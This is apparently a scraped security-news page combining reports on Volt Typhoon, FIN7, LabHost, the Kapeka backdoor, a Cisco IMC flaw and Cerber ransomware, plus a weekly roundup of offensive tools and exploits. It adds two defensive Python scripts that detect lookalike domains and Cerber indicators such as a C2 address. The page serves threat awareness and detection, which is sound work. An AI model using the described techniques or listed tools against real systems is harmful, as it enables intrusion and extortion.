FBI chief says China is preparing to attack US critical infrastructure
China-linked threat actors are preparing cyber attacks against U.S. critical infrastructure, FBI Director Christopher Wray warned.
FBI Director Christopher Wray warned this week that China-linked threat actors are preparing an attack against U.S. critical infrastructure, Reuters reported.
According to the FBI chief, the Chinese hackers are waiting “for just the right moment to deal a devastating blow.”
In February, US CISA, the NSA, the FBI, along with partner Five Eyes agencies, published a joint advisory to warn that China-linked APT Volt Typhoon infiltrated a critical infrastructure network in the US and remained undetected for at least five years.
“The U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years,” reads the alert.
The Volt Typhoon group has been active since at least mid-2021, carrying out cyber operations against critical infrastructure. In its most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors.
The APT group is using almost exclusively living-off-the-land techniques and hands-on-keyboard activity to evade detection.
In December 2023, Microsoft first noticed that to conceal malicious traffic, the threat actor routes it through compromised small office and home office (SOHO) network devices, including routers, firewalls, and VPN hardware. The group also relies on customized versions of open-source tools for C2 communications and to stay under the radar.
The Chinese cyberespionage group has successfully breached the networks of multiple US critical infrastructure organizations. Most of the impacted organizations are in the Communications, Energy, Transportation Systems, and Water and Wastewater Systems sectors.
“The group also relies on valid accounts and leverages strong operational security, which combined, allows for long-term undiscovered persistence. In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years,” continues the alert. “Volt Typhoon actors conduct extensive pre-exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim’s environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise.”
U.S. agencies fear the possibility that these actors could gain access to the networks of critical infrastructure to cause disruptive effects in the event of potential geopolitical tensions and/or military conflicts.
Volt Typhoon’s activities suggest that the group primarily aims to establish a foothold within networks to secure access to Operational Technology (OT) assets.
The US agencies also released a technical guide containing recommendations to identify and mitigate living off the land techniques adopted by the APT group.
A Chinese Foreign Ministry spokesperson recently stated that the Volt Typhoon activity is not associated with Beijing, but linked it to a cybercrime operation.
Wray confirmed that Volt Typhoon’s campaign is still ongoing and has breached numerous American companies in the telecommunications, energy, water and other critical sectors.
The state-sponsored hackers also targeted 23 pipeline operators, Wray revealed during a speech at Vanderbilt Summit on Modern Conflict and Emerging Threats.
The FBI Director remarked that China is developing the “ability to physically wreak havoc on US critical infrastructure at a time of its choosing,” adding: “Its plan is to land low blows against civilian infrastructure to try to induce panic.”
Wray explained that it is difficult to determine the purpose behind the cyber pre-positioning; however, the activity is part of a broader strategy to dissuade the U.S. from defending Taiwan.
Wray added that the China-linked actors employed a series of botnets in their activities.
In December, the Black Lotus Labs team at Lumen Technologies linked a small office/home office (SOHO) router botnet, tracked as KV-Botnet, to the operations of the China-linked threat actor Volt Typhoon. The botnet is comprised of two complementary activity clusters, and the experts believe it has been active since at least February 2022. The threat actors target devices at the edge of networks.
The KV-Botnet is composed of end-of-life SOHO devices. In early July and August 2022, the researchers noticed several Cisco RV320s, DrayTek Vigor routers, and NETGEAR ProSAFEs that were part of the botnet. Later, in November 2022, most of the devices in the botnet were ProSAFE devices, with a smaller number of DrayTek routers. In November 2023, the experts noticed that the botnet started targeting Axis IP cameras, such as the M1045-LW, M1065-LW, and P1367-E.
The researchers pointed out that use of the KV-Botnet is limited to China-linked actors. Thus far the victimology aligns primarily with a strategic interest in the Indo-Pacific region; the experts observed a focus on ISPs and government organizations.
About the author: Pierluigi Paganini
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, China)
United Nations Development Programme (UNDP) investigates data breach
The United Nations Development Programme (UNDP) has initiated an investigation into an alleged ransomware attack and the subsequent theft of data.
The United Nations Development Programme (UNDP) is investigating an alleged ransomware attack that resulted in data theft.
The United Nations Development Programme (UNDP) is a United Nations agency tasked with helping countries eliminate poverty and achieve sustainable economic growth and human development.
The cyber attack recently targeted the IT infrastructure of the Agency in UN City, Copenhagen.
On March 27, UNDP became aware that a data-extortion threat actor had stolen data, including human resources and procurement information.
“On March 27, UNDP received a threat intelligence notification that a data-extortion actor had stolen data which included certain human resources and procurement information.” reads the statement published by the Agency. “Actions were immediately taken to identify a potential source and contain the affected server as well as to determine the specifics of the exposed data and who was impacted.”
UNDP is investigating the security incident to determine the scope of the cyberattack. The agency is keeping individuals affected by the breach updated and sharing information with other stakeholders, including its partners across the UN system.
“UNDP takes this incident extremely seriously and we reiterate our dedication to data security. We are committed to continue working to detect and minimize the risk of cyber-attacks.” continues the statement.
UNDP did not share details about the attack, however, on March 27, 2024, the ransomware group 8base added the agency to its Tor leak site (the Tor leak site is unavailable at the time of this writing).
The extortion group has yet to publish the stolen data.
FIN7 targeted a large U.S. carmaker with phishing attacks
BlackBerry reported that the financially motivated group FIN7 targeted the IT department of a large U.S. carmaker with spear-phishing attacks.
In late 2023, BlackBerry researchers spotted the threat actor FIN7 targeting a large US automotive manufacturer with a spear-phishing campaign. FIN7 targeted employees who worked in the company’s IT department and had higher levels of administrative rights.
The attackers employed the lure of a free IP scanning tool to infect the systems with the Anunak backdoor and gain an initial foothold using living-off-the-land binaries, scripts, and libraries (LOLBAS).
FIN7 (aka Carbanak) is a Russian criminal group that has been active since mid-2015. It focuses on the restaurant, gambling, and hospitality industries in the US to harvest financial information that is then used in attacks or sold in cybercrime marketplaces.
FIN7 has been observed using the PowerShell script POWERTRASH, which is a custom obfuscation of the shellcode invoker in PowerSploit.
In the attacks analyzed by BlackBerry, the threat actors used a typosquatting technique: the malicious URL “advanced-ip-sccanner[.]com” masquerades as the legitimate website “advanced-ip-scanner[.]com”, which offers a free online scanner.
Upon visiting the rogue site, visitors were redirected to “myipscanner[.]com”, which in turn redirected them to an attacker-owned Dropbox that downloaded the malicious executable WsTaskLoad.exe onto their systems.
Upon execution, the executable initiates a complex multi-stage process comprising DLLs, WAV files, and shellcode execution. This process culminates in the loading and decryption of a file called ‘dmxl.bin,’ which contains the Anunak payload.
The threat actors used WsTaskLoad.exe to install OpenSSH for persistence, relying on a scheduled task to keep OpenSSH running on the victim’s machine.
While historical data demonstrates that FIN7 often employs OpenSSH for lateral movement, no such activity was detected in this particular campaign. OpenSSH is also used for external access.
“While the tactics, techniques, and procedures (TTPs) involved in this campaign have been well documented over the past year, the OpenSSH proxy servers utilized by the attackers have not been disseminated.” concludes the report that also includes recommendations for Mitigation and IoCs (Indicators of Compromise). “BlackBerry thinks it prudent to enable individuals and entities to also identify these hosts and protect themselves.”
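A lookalike-domain check for the typosquatting lure described above, as an added example that is not BlackBerry's code or part of the original post. It compares queried names against a watchlist using optimal-string-alignment distance, so advanced-ip-sccanner.com (one extra 'c') surfaces against advanced-ip-scanner.com; the watchlist, the two-label registrable-domain rule and the dnsmasq-style DNS log lines are assumptions and constructed sample input.

```python
"""Lookalike-domain check for typosquatted tool domains (added example)."""
import re

WATCHLIST = {"advanced-ip-scanner.com"}  # domain from the article; extend as needed
MAX_DISTANCE = 2                         # edits allowed before a name counts as a lookalike


def osa_distance(a: str, b: str) -> int:
    """Restricted Damerau-Levenshtein (OSA) distance: edits plus adjacent swaps."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def registrable_domain(qname: str) -> str:
    """Assumption: the last two labels form the registrable domain.
    Production code should consult the Public Suffix List instead."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_of(qname: str):
    """Return (watchlist_domain, distance) when qname is a near miss, else None."""
    reg = registrable_domain(qname)
    if reg in WATCHLIST:
        return None  # exact match is the legitimate site itself
    best = None
    for legit in WATCHLIST:
        dist = osa_distance(reg, legit)
        if dist <= MAX_DISTANCE and (best is None or dist < best[1]):
            best = (legit, dist)
    return best


# dnsmasq-style "query[A] <name> from <client>" lines; constructed sample input.
QUERY_RE = re.compile(r"query\[A{1,4}\]\s+(?P<qname>\S+)\s+from\s+(?P<client>\S+)")
SAMPLE_DNS_LOG = [
    "Apr 16 10:02:11 dnsmasq[1234]: query[A] advanced-ip-scanner.com from 10.0.5.12",
    "Apr 16 10:02:19 dnsmasq[1234]: query[A] www.advanced-ip-sccanner.com from 10.0.5.12",
    "Apr 16 10:02:20 dnsmasq[1234]: query[AAAA] myipscanner.com from 10.0.5.12",
    "Apr 16 10:04:02 dnsmasq[1234]: query[A] advanced-ip-scanenr.com from 10.0.5.40",
    "Apr 16 10:05:13 dnsmasq[1234]: query[A] updates.example.com from 10.0.5.13",
]


def scan_dns_log(lines):
    """Return (client, queried name, watchlist domain, distance) for each lookalike."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        match = lookalike_of(m.group("qname"))
        if match:
            hits.append((m.group("client"), m.group("qname"), match[0], match[1]))
    return hits


if __name__ == "__main__":
    for client, qname, legit, dist in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{client} queried {qname}: {dist} edit(s) from {legit}")
```

Note that the redirect hop myipscanner.com is not a near miss of anything on the watchlist, so this check does not flag it; that hop needs a different control, such as proxy categorisation.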
Law enforcement operation dismantled phishing-as-a-service platform LabHost
An international law enforcement operation led to the disruption of the prominent phishing-as-a-service platform LabHost.
An international law enforcement operation, codenamed Nebulae and coordinated by Europol, led to the disruption of LabHost, which is one of the world’s largest phishing-as-a-service platforms.
Law enforcement from 19 countries participated in the operation which resulted in the arrest of 37 individuals.
The phishing-as-a-service platform was available on the clear web and has been shut down by the police.
Between April 14th and April 17th, law enforcement agencies conducted searches at 70 addresses worldwide, leading to the arrest of the suspects. Four individuals, including the original developer of LabHost, were arrested in the United Kingdom.
Phishing-as-a-service (PhaaS) platforms provide phishing tools and resources to crooks, often for a fee or subscription. These tools typically include pre-designed phishing templates, email or text message sending capabilities, and website hosting services for phishing pages. The most important PhaaS platforms also provide technical support to their customers.
LabHost was a prominent tool for cybercriminals globally, offering a subscription-based service that facilitated phishing attacks. The platform provided phishing kits, hosting infrastructure, interactive features for engaging victims, and campaign management tools. The investigation conducted by law enforcement revealed approximately 40,000 phishing domains associated with LabHost, which reached 10,000 users worldwide. Subscribers paid an average monthly fee of $249 to use the platform’s services. LabHost offered a selection of over 170 convincing fake websites for users to deploy with ease.
“What made LabHost particularly destructive was its integrated campaign management tool named LabRat. This feature allowed cybercriminals deploying the attacks to monitor and control those attacks in real time. LabRat was designed to capture two-factor authentication codes and credentials, allowing the criminals to bypass enhanced security measures.” reads the announcement published by Europol.
Australian police arrested five individuals across the country as part of the operation; the authorities reported that more than 94,000 people in Australia were victims of attacks launched through the platform.
“Australian offenders are allegedly among 10,000 cybercriminals globally who have used the platform, known as LabHost, to trick victims into providing their personal information, such as online banking logins, credit card details and passwords, through persistent phishing attacks sent via texts and emails.” reported the AFP.
“As a result of the Australian arm of the investigation, led by the AFP’s Joint Policing Cybercrime Coordination Centre (JCP3), more than 200 officers from the AFP and state and territory police were yesterday (17 April, 2024) involved in executing 22 search warrants across five states. This included 14 in Victoria, two in Queensland, three in NSW, one in South Australia and two in Western Australia. A Melbourne man and an Adelaide man, who police will allege were LabHost users, were arrested during the warrants and charged with cybercrime-related offences. Three Melbourne men were also arrested by Victoria Police and charged with drug-related offences.”
The U.K. Metropolitan Police said LabHost’s sites have ensnared approximately 70,000 victims in the UK alone. On a global scale, the service has acquired 480,000 card numbers, 64,000 PIN numbers, and over one million passwords for various online services. The actual number of victims is anticipated to surpass current estimates, with ongoing efforts focused on identifying and assisting as many affected individuals as feasible.
Operators behind the PhaaS have received about £1 million in payments from criminal users since its launch.
Previously unknown Kapeka backdoor linked to Russian Sandworm APT
Russia-linked APT Sandworm employed a previously undocumented backdoor called Kapeka in attacks against Eastern Europe since 2022.
WithSecure researchers identified a new backdoor named Kapeka that has been used in attacks targeting victims in Eastern Europe since at least mid-2022. The backdoor is very sophisticated: it serves both as an initial toolkit and as a backdoor for maintaining long-term access to compromised systems. The nature of the targets, the low detection rate, and the sophisticated features supported by the malware suggest that an APT group developed it.
WithSecure noticed overlaps between Kapeka and GreyEnergy and the Prestige ransomware attacks which are attributed to the Russia-linked Sandworm APT group. WithSecure believes that Kapeka is likely part of the Sandworm’s arsenal.
The Sandworm group (aka BlackEnergy, UAC-0082, Iron Viking, Voodoo Bear, and TeleBots) has been active since 2000 and operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST). The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017. In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe.
“Kapeka contains a dropper that will drop and launch a backdoor on a victim’s machine and then remove itself. The backdoor will first collect information and fingerprint both the machine and user before sending the details on to the threat actor.” states WithSecure. “This allows tasks to be passed back to the machine or the backdoor’s configuration to be updated. WithSecure do not have insight as to how the Kapeka backdoor is propagated by Sandworm.”
The researchers speculate that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm’s toolkit.
Kapeka includes a dropper that acts as a launcher for a backdoor component on the infected host, after which it removes itself. The dropper also sets up persistence for the backdoor through a scheduled task (if admin or SYSTEM) or autorun registry (if not).
The Kapeka backdoor is a Windows DLL with a single exported function. The malware masquerades as a Microsoft Word Add-In (.wll) file. It is written in C++ and compiled with Visual Studio 2017 (15.9). Upon execution, it requires the “-d” argument on the initial run but not on subsequent executions. The malware has a multi-threaded implementation, using event objects for thread synchronization and signaling.
The backdoor employs the WinHttp 5.1 COM interface (winhttpcom.dll) for its network communication module. It interacts with its C2 server to fetch tasks and relay fingerprinted data and task outcomes. The malware uses JSON for C2 communication. Two distinct threads manage network communication: one for sending fingerprinted data and fetching tasks, and another for transmitting completed task results to the C2. Both threads utilize the same request/response mechanism.
The backdoor can update its C2 configuration dynamically by receiving a new JSON configuration (with the key “GafpPS”) from the C2 server during polling. If the received configuration differs from the current one, the backdoor updates its configuration on-the-fly and stores the latest C2 configuration in the registry value (“Seed”). The backdoor can also perform various tasks on the infected system by receiving a list of tasks as a JSON response (with the key “Td7opP”) from its C2 server during polling. The malicious code spawns a separate thread to execute each task.
“The backdoor’s victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin. However, due to sparsity of data at the time of writing, the infection vector, the threat actor, and the actor’s ‘actions on objectives’ cannot be conclusively stated. Nevertheless, we examined multiple data points that strongly suggest a link between Kapeka and Sandworm,” concludes the report.
Cisco warns of a command injection escalation flaw in its IMC. PoC publicly available
Cisco has addressed a high-severity vulnerability in its Integrated Management Controller (IMC) for which publicly available exploit code exists.
Cisco has addressed a high-severity Integrated Management Controller (IMC) vulnerability and is aware of publicly available exploit code for this issue. The PoC exploit code allows a local attacker to escalate privileges to root.
Cisco Integrated Management Controller (IMC) is a baseboard management controller (BMC) that provides embedded server management for Cisco UCS C-Series Rack Servers and Cisco UCS S-Series Storage Servers.
The vulnerability, tracked as CVE-2024-20295, resides in the CLI of the Cisco Integrated Management Controller (IMC). A local, authenticated attacker can exploit the vulnerability to conduct command injection attacks on the underlying operating system and elevate privileges to root. The IT giant reported that to exploit this vulnerability, the attacker must have read-only or higher privileges on an affected device.
“This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.” reads the advisory.
The flaw impacts the following products if they are running a vulnerable release of Cisco IMC in the default configuration:
- 5000 Series Enterprise Network Compute Systems (ENCS)
- Catalyst 8300 Series Edge uCPE
- UCS C-Series Rack Servers in standalone mode
- UCS E-Series Servers
Cisco devices that are based on a preconfigured version of a UCS C-Series Server are also impacted by this flaw if they expose access to the IMC CLI.
The company states that there are no workarounds for this vulnerability.
The Cisco PSIRT is aware that proof-of-concept exploit code is available for this vulnerability; however, it is not aware of attacks in the wild exploiting it.
Linux variant of Cerber ransomware targets Atlassian servers
Threat actors are exploiting the CVE-2023-22518 flaw in Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware.
At the end of October 2023, Atlassian warned of a critical security flaw, tracked as CVE-2023-22518 (CVSS score 9.1), that affects all versions of Confluence Data Center and Server.
The vulnerability is an improper authorization issue that can lead to significant data loss if exploited by an unauthenticated attacker.
Cado Security Labs recently became aware that Cerber ransomware is being deployed into Confluence servers via the CVE-2023-22518 exploit. The experts pointed out that there is very little knowledge about the Linux variant of the ransomware family.
Cerber has been active since at least 2016; most recently it was involved in attacks against Confluence servers.
The malware includes three heavily obfuscated C++ payloads compiled as 64-bit Executable and Linkable Format (ELF) files and packed with UPX. UPX is a widely-used packer among threat actors, enabling the storage of encoded program code within the binary. At runtime, the code is extracted in memory and executed, a process known as “unpacking,” to evade detection by security software.
Attackers exploited this vulnerability to gain initial access to vulnerable Atlassian instances.
“We have observed instances of the Cerber ransomware being deployed after an attacker leveraged CVE-2023-22518 in order to gain access to vulnerable instances of Confluence. It is a fairly recent improper authorization vulnerability that allows an attacker to reset the Confluence application and create a new administrator account using an unprotected configuration restore endpoint used by the setup wizard.” states Cado Security.
Financially motivated threat actors created an admin account to deploy the Effluence web shell plugin and execute arbitrary commands on the vulnerable server.
The attackers use the web shell to download and run the primary Cerber payload.
“In a default install, the Confluence application is executed as the “confluence” user, a low privilege user. As such, the data the ransomware is able to encrypt is limited to files owned by the confluence user. It will of course succeed in encrypting the datastore for the Confluence application, which can store important information.” continues the report. “If it was running as a higher privilege user, it would be able to encrypt more files, as it will attempt to encrypt all files on the system.”
The payload is written in C++, highly obfuscated, and packed with UPX. The researchers pointed out that it serves as a stager for further payloads; the malware uses a C2 server at 45[.]145[.]6[.]112 to download and unpack them. Upon execution, the malicious code can delete itself from the disk.
Upon execution, the malware unpacks itself, and tries to create a file at /var/lock/0init-ld.lo.
It then connects to the (now defunct) C2 server at 45[.]145[.]6[.]112 and fetches a log checker known internally as agttydck.
Upon executing “agttydck.bat”, the primary payload downloads and executes the encryptor payload “agttydcb.bat”.
The agttydcb encryptor, written in C++ and packed with UPX, performs several malicious actions: it logs activity in “/tmp/log.0” at startup and “/tmp/log.1” at completion, searches the root directory for encryptable directories, drops a ransom note in each directory, and encrypts all files, appending a “.L0CK3D” extension.
“Cerber is a relatively sophisticated, albeit aging, ransomware payload. While the use of the Confluence vulnerability allows it to compromise a large amount of likely high value systems, often the data it is able to encrypt will be limited to just the confluence data and in well configured systems this will be backed up. This greatly limits the efficacy of the ransomware in extracting money from victims, as there is much less incentive to pay up.” concludes the report that also includes Indicators of compromise (IoCs).
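A host-triage script for the on-disk and network indicators the Cado write-up lists, as an added example that is not part of the original report or post. It assumes the artifact paths and C2 address given above; the ransom note filename is not given on the page, so it is not matched, and the staged directory tree and connection-log lines are constructed.

```python
"""Triage a Linux host for the Cerber artifacts described above (added example)."""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Artifacts named in the Cado write-up, relative to the scan root.
CERBER_MARKER_FILES = (
    "var/lock/0init-ld.lo",  # created by the primary payload after unpacking
    "tmp/log.0",             # written by the encryptor at startup
    "tmp/log.1",             # written by the encryptor on completion
)
ENCRYPTED_SUFFIX = ".L0CK3D"
CERBER_C2_IP = "45.145.6.112"  # defanged in the report as 45[.]145[.]6[.]112


@dataclass
class ScanResult:
    markers_found: list = field(default_factory=list)
    encrypted_files: list = field(default_factory=list)
    encrypted_dirs: list = field(default_factory=list)

    def is_suspicious(self) -> bool:
        return bool(self.markers_found or self.encrypted_files)


def scan_tree(root: str = "/") -> ScanResult:
    """Collect Cerber file artifacts below `root`; paths are reported relative."""
    result = ScanResult()
    for rel in CERBER_MARKER_FILES:
        if os.path.isfile(os.path.join(root, rel)):
            result.markers_found.append(rel)
    dirs = set()
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            if name.endswith(ENCRYPTED_SUFFIX):
                rel_dir = os.path.relpath(dirpath, root)
                result.encrypted_files.append(os.path.join(rel_dir, name))
                dirs.add(rel_dir)
    result.encrypted_files.sort()
    result.encrypted_dirs = sorted(dirs)
    return result


# Whole-address match so that 145.145.6.112 or 45.145.6.1120 do not hit.
_C2_RE = re.compile(r"(?<![\d.])" + re.escape(CERBER_C2_IP) + r"(?![\d.])")


def find_c2_connections(log_lines):
    """Return the log lines that reference the Cerber C2 address."""
    return [line for line in log_lines if _C2_RE.search(line)]


# Constructed sample log lines (not real telemetry) in a conntrack-like form.
SAMPLE_CONN_LOG = [
    "2024-04-16T10:02:11Z confluence-01 conntrack: NEW tcp src=10.0.5.12 dst=45.145.6.112 dport=443",
    "2024-04-16T10:02:12Z confluence-01 conntrack: NEW tcp src=10.0.5.12 dst=145.145.6.112 dport=443",
    "2024-04-16T10:03:40Z confluence-01 conntrack: NEW udp src=10.0.5.12 dst=10.0.0.53 dport=53",
]


def stage_test_tree(base: str) -> None:
    """Lay down a constructed tree that mimics a host after the encryptor ran."""
    for rel in CERBER_MARKER_FILES:
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
    data_dir = os.path.join(base, "confluence-data")  # assumed data directory name
    os.makedirs(data_dir, exist_ok=True)
    for name in ("confluence.cfg.xml.L0CK3D", "attachments.bin.L0CK3D", "readme.txt"):
        open(os.path.join(data_dir, name), "w").close()


def run_staged_scan():
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        stage_test_tree(tmp)
        result = scan_tree(tmp)
    return result, find_c2_connections(SAMPLE_CONN_LOG)


if __name__ == "__main__":
    res, c2_hits = run_staged_scan()
    print("markers:", res.markers_found)
    print("encrypted:", res.encrypted_files)
    print("c2 lines:", len(c2_hits))
```

Run scan_tree() with its default root on a suspect host; as the report notes, a default install encrypts only what the confluence user can write, so findings cluster under the Confluence data directories.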
Last Week in Security (LWiS) - 2024-04-16
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-04-08 to 2024-04-16.
News
- Google Public Sector achieves Top Secret and Secret cloud authorization - Google has entered the chat. With Microsoft's recent APT issues, I wonder if any orgs will consider Google.
- Muddled Libra's Evolution to the Cloud - Unit 42 researchers discovered that the Muddled Libra group now actively targets software-as-a-service (SaaS) applications and cloud service provider (CSP) environments.
- Toward greater transparency: Adopting the CWE standard for Microsoft CVEs - "...we will now publish root cause data for Microsoft CVEs using the Common Weakness Enumeration (CWE™) industry standard."
- Our Response to Hashicorp's Cease and Desist Letter - Some turmoil in the IaC world. "The OpenTofu team vehemently disagrees with any suggestion that it misappropriated, mis-sourced, or otherwise misused HashiCorp's BSL code. All such statements have zero basis in facts."
- Amazon CloudFront now supports Origin Access Control (OAC) for Lambda function URL origins - Let your cloud teams know!
- [PDF] KONA BLUE - Declassified DHS project: a special access program for recovering materials used for interdimensional, time, and space travel. While the project was only a SAP for six months and seems like it never really did anything, a look into what goes into a SAP is interesting, and it is the first example of one being declassified that we are aware of.
- Microsoft will add External Recipient Rate email limits to Exchange Online in January 2025 - The paywalls continue; this is a push for more revenue from the Azure email service. This could impact your bulk phishing engagements if you're using Exchange as your mail sender and send to more than 2,000 recipients a day.
- Twitter's Clumsy Pivot to X.com Is a Gift to Phishers - Rewriting URLs is a dangerous game.
- Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400) - This is being actively exploited in the wild, and is this month's SSLVPN RCE...
Techniques and Write-ups
- Using Microsoft Dev Tunnels for C2 Redirection - Using dev tunnels as your C2. Careful with burning your Microsoft account.
- CS Technologies — Evolution Vulnerabilities - A set of vulnerabilities within software used to administer the EVO2 and EVO4 door access controllers. Chained together, this leads to unauthenticated access to add a user with access to every door in the building, control doors, etc.
- A trick, the story of CVE-2024-26230 - A step-by-step walkthrough of CVE-2024-26230 (use-after-free vulnerability in the telephony service).
- We discovered an AWS access vulnerability - A vulnerability in AWS STS allowed users to gain unauthorized account access due to incorrect role trust policy evaluations. It's been patched! Cool to read that this SaaS has a different AWS account per customer as a security boundary.
- Resolving Stack Strings with Capstone Disassembler & Unicorn in Python - Walkthrough on how to resolve stack strings in malware using Capstone Disassembler and Unicorn Emulator in Python. They used Conti Ransomware to showcase it.
- Chaining N-days to Compromise All: Part 3 — Windows Driver LPE: Medium to System - This post discusses the exploitation of a logic bug in the Windows kernel driver mskssrv.sys (CVE-2023-29360), which was demonstrated in Pwn2Own 2023. The exploit allows priv-esc from user to SYSTEM by manipulating the Memory Descriptor List (MDL) to map physical memory addresses incorrectly, effectively bypassing security checks. It was part of this crazy VM escape chain.
- Rooting out Risky SCCM Configs with Misconfiguration Manager - The SpecterOps team has published a script for sysadmins and infosec practitioners to identify every TAKEOVER and ELEVATE attack in Misconfiguration-Manager. SCCM is an overlooked attack surface that usually holds a privileged position in the AD network.
- Understanding ETW Patching - A quick summary from @jsecurity101 on how function patching can be applied to ETW providers to alter or inhibit their standard behavior, potentially evading detection by modifying or bypassing function execution in both user-mode and kernel-mode operations.
- CreateRCE — Yet Another Vulnerability in CreateUri - In another episode of Akamai vs Outlook clients... "An attacker on the internet can trigger the vulnerability against Outlook clients without any user interaction (zero-click)". The technical write-up of CVE-2023-35628, which was patched in December 2023.
- Sysrv Infection (Linux Edition) - Write up of the Sysrv botnet, which deployed a crypto miner on a Linux system using a payload pulled down from a specified URL. Sometimes detecting these can be as easy as checking those DNS logs for known mining pools.
- My Journey on Integrating Sliver into Mythic - Mythic agents that use Mythic's API and Sliver's API to remotely control Sliver agents from within Mythic!
- How I Leveraged WMI to Enumerate a Process Modules and Their Base Addresses - "Leverage Windows Management Instrumentation (WMI) to extract the loaded modules of a specific process and understand how to get each module base address, show the advantages and the ability to perform ShellCode injection in .text section directly."
- Why you shouldn't use a commercial VPN: Amateur hour with Windscribe - If you are going to use a commercial VPN, at least generate standard WireGuard or OpenVPN configs and use the industry standard apps. This is why.
- Flaw in PuTTY P-521 ECDSA signature generation leaks SSH private keys - "An attacker who compromises an SSH server may be able to leverage this vulnerability to compromise the user's private key. Attackers may also be able to compromise the SSH private keys of anyone who used git+ssh with commit signing and a P-521 SSH key, simply by collecting public commit signatures." Cryptography is hard!
Tools and Exploits
- UserManagerEoP - PoC for CVE-2023-36047. Patched last week. Should still be viable if you're on an engagement right now!
- Gram - Klarna's own threat model diagramming tool.
- Shoggoth - Shoggoth is an open-source project based on C++ and asmjit library used to encrypt given shellcode, PE, and COFF files polymorphically.
- ExploitGSM - Exploit for 6.4 - 6.5 Linux kernels and another exploit for 5.15 - 6.5. Zero days when published.
- Copilot-For-Security - Microsoft Copilot for Security is a generative AI-powered security solution that helps increase the efficiency and capabilities of defenders to improve security outcomes at machine speed and scale, while remaining compliant to responsible AI principles
- CVE-2024-21378 - DLL code for testing CVE-2024-21378 in MS Outlook. Using this with Ruler.
- ActionsTOCTOU - Example repository for GitHub Actions Time of Check to Time of Use (TOCTOU vulnerabilities).
- obfus.h - obfus.h is a macro-only library for compile-time obfuscation of C applications, designed specifically for the Tiny C Compiler (tcc). It is tailored for Windows x86 and x64 platforms and supports almost all versions of the compiler.
- Wareed DNS C2 - Wareed DNS C2 is a Command and Control (C2) that utilizes the DNS protocol for secure communications between the server and the target. Designed to minimize communication and limit data exchange, it is intended to be a first-stage C2 to persist in machines that don't have access to the internet via HTTP/HTTPS, but where DNS is allowed.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
- Can you hack your government? - A list of governments with Vulnerability Disclosure Policies.
- GoAlert - Open source on-call scheduling, automated escalations, and notifications so you never miss a critical alert
- AssetViz - AssetViz simplifies the visualization of subdomains from input files, presenting them as a coherent mind map. Ideal for penetration testers and bug bounty hunters conducting reconnaissance, AssetViz provides intuitive insights into domain structures for informed decision-making.
- GMER - the art of exposing Windows rootkits in kernel mode - GMER is an anti-rootkit tool for detecting and removing rootkits, focused on kernel-mode rootkits, and it remains useful even though many anti-rootkit tools have lost relevance as Windows security has advanced.
- AiTM Phishing with Azure Functions - The deployment of a serverless AiTM phishing toolkit using Azure Functions to phish Entra ID credentials and cookies
- orange - Orange Meets is a demo application built using Cloudflare Calls, and a starting point for building your own WebRTC application on Cloudflare Calls. Combine this with OpenVoice or Real-Time-Voice-Cloning. Scary.
- awesome-secure-defaults - Share this with your development teams and friends or use it in your own tools. "Awesome secure by default libraries to help you eliminate bug classes!"
- NtWaitForDebugEvent + WaitForMultipleObjects - Using these two together to wait for debug events from multiple debugees at once.
- taranis-ai - Taranis AI is an advanced Open-Source Intelligence (OSINT) tool, leveraging Artificial Intelligence to revolutionize information gathering and situational analysis.
- MSFT_DriverBlockList - Repository of Microsoft Driver Block Lists based off of OS-builds.
- HSC24RedTeamInfra - Slides and Codes used for the workshop Red Team Infrastructure Automation at HackSpanCon2024.
- SuperMemory - Build your own second brain with supermemory. It's a ChatGPT for your bookmarks. Import tweets or save websites and content using the chrome extension.
- Kubenomicon - An open source offensive security focused threat matrix for kubernetes with an emphasis on walking through how to exploit each attack.
Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.
Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks
GenAI: A New Headache for SaaS Security Teams
Ivanti fixed two critical flaws in its Avalanche MDM
